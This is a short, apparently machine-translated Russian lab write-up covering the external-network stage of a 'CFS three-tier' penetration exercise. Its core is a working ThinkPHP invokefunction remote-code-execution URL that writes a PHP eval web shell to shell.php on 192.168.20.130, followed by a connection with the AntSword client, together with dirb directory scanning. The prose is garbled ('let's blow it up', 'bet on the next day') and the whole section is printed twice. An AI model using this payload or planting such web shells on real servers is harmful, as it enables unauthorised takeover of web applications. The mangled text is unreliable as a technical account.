Обмен технологиями

CFS трехуровневое проникновение во внутреннюю сеть - управление внешней сетью (1)

2024-07-12

한어Русский языкEnglishFrançaisIndonesianSanskrit日本語DeutschPortuguêsΕλληνικάespañolItalianoSuomalainenLatina

Оглавление

Управление внешней сетью

Давайте сначала взорвем его и посмотрим, есть ли способ атаковать.

Я попробовал подозрительный путь и обнаружил, что это фреймворк thinkphp. Версию я тоже знал, так что поспорим на следующий день.

напиши на php

Успешно отредактируйте и напишите на php, просто получите его на следующий день.

Ссылка на муравьиный меч

Успешно удалось


Управление внешней сетью

Давайте сначала взорвем его и посмотрим, есть ли способ атаковать.

Вы можете попробовать dirsearch, dirb, gobuster и другие инструменты.

dirb http://192.168.20.130/

Я попробовал подозрительный путь и обнаружил, что это фреймворк thinkphp. Версию я тоже знал, так что поспорим на следующий день.

напиши на php

http://192.168.20.130/public/index.php?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST['cmd']);?>

Успешно записано на php, легко получить.

http://192.168.20.130/public/shell.php

Ссылка на муравьиный меч

Успешно удалось